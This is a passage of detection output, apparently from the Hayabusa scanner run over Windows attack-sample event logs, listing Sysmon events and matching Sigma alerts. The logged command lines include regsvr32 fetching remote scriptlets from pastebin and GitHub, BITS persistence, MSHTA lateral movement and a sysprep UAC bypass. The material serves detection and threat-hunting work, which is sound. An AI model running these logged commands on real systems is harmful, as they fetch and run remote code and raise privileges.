LID: 0x13eee | PID: 1420 | PGUID: 365ABB72-6759-5CD8-0000-0010E2D50F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx 2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx 2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx 2019-05-13 03:35:05.780 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll | LID: 0x13eee | PID: 1912 | PGUID: 365ABB72-6759-5CD8-0000-001085031000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx 2019-05-13 03:35:06.562 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49165 (IEWIN7..home) | Dst: 104.20.208.21:80 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 1420 | PGUID: 365ABB72-6759-5CD8-0000-0010E2D50F00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx 2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,../hayabusa-rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx 2019-05-13 03:48:52.219 +09:00,IEWIN7,1,info,,Process Created,"Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | Process: C:\ProgramData\jabber.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13715 | PID: 1340 | PGUID: 365ABB72-6A94-5CD8-0000-00101BDB0E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx 2019-05-13 03:48:52.766 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | LID: 0x13715 | PID: 3880 | PGUID: 365ABB72-6A94-5CD8-0000-0010C2F10E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx 2019-05-13 23:50:59.389 +09:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: hola | URL: C:\Windows\system32\cmd.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx 2019-05-14 03:02:49.160 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mobsync.exe -Embedding | Process: C:\Windows\System32\mobsync.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1341d | PID: 3828 | PGUID: 365ABB72-B147-5CD9-0000-00109D4F0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx 2019-05-14 03:03:19.681 +09:00,IEWIN7,1,info,,Process Created,Cmd: /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x133de | PID: 2372 | PGUID: 365ABB72-B167-5CD9-0000-0010EE150C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx 2019-05-14 03:03:19.681 +09:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x1341d | PID: 2476 | PGUID: 365ABB72-B167-5CD9-0000-001062160C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx 2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx 2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx 2019-05-14 03:03:19.895 +09:00,IEWIN7,1,info,,Process Created,Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: /c notepad.exe | LID: 0x133de | PID: 2584 | PGUID: 365ABB72-B167-5CD9-0000-00109D240C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx 2019-05-14 03:03:21.212 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49159 (IEWIN7) | Dst: 151.101.128.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2476 | PGUID: 365ABB72-B167-5CD9-0000-001062160C00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx 2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,../hayabusa-rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx 2019-05-14 03:05:18.692 +09:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 1188 | PGUID: 365ABB72-B1DE-5CD9-0000-0010715B0D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx 2019-05-14 09:29:52.744 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:58172 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx 2019-05-14 09:32:22.775 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55099 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx 2019-05-14 09:32:36.775 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55101 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx 2019-05-14 10:29:04.306 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mshta.exe -Embedding | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1070ce | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx 2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx 2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx 2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Evas,MSHTA Spwaned by SVCHOST,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx 2019-05-14 10:29:05.534 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49168 (IEWIN7) | Dst: 10.0.2.17:55683 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx 2019-05-14 11:32:48.290 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2676 | Tgt PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:48.290 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2676 | PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:48.359 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 3964 | Tgt PGUID: 365ABB72-28D0-5CDA-0000-0010F76F1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:48.359 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 3964 | PGUID: 365ABB72-28D0-5CDA-0000-0010F76F1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.143 +09:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 288 03573528 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3776 | PGUID: 365ABB72-28D3-5CDA-0000-0010B08B1300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.453 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 1020 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.453 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 1020 | PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.470 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2768 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.470 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2768 | PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.487 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\explorer.exe | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 572 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.487 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 572 | PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.487 +09:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 312 0197CDB0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3388 | PGUID: 365ABB72-28D3-5CDA-0000-001055AD1300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.814 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13545 | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.831 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\cryptbase.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: Yokai Ltd. | Signed: false | Signature: Unavailable | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300 | Hash: SHA1=4DA0DCAD144039F6DD7739E37AB3A7B78FB86B4D,MD5=2BA4BC4753A29D56AA185C972CA1023E,SHA256=A6BE522A1FC48B391EFCB3A3CFE49560A455F1BB853505F7E9ACCA8EDF116B4C,IMPHASH=380A21A3D5988707B0CFE7CA5B1C7E0B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.831 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | LID: 0x13545 | PID: 3976 | PGUID: 365ABB72-28D3-5CDA-0000-001088C71300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 23:03:45.100 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09c49153\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx 2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.exe | Process: C:\Windows\system32\mstsc.exe | PID: 2580 | PGUID: ECAD0485-C903-5CDA-0000-0010340F1000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx 2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,C2,Hijack Legit RDP Session to Move Laterally,,../hayabusa-rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx 2019-05-14 23:04:06.339 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09cc920e\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx 2019-05-14 23:04:28.860 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09e09039\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx 2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49583 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx 2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx 2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49584 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx 2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx 2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49586 (alice.insecurebank.local) | Dst: 10.59.4.24:445 (edward) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx 2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49587 (alice.insecurebank.local) | Dst: 10.59.4.21:445 (bob) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx 2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49588 (alice.insecurebank.local) | Dst: 10.59.4.22:445 (CHARLES) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx 2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49589 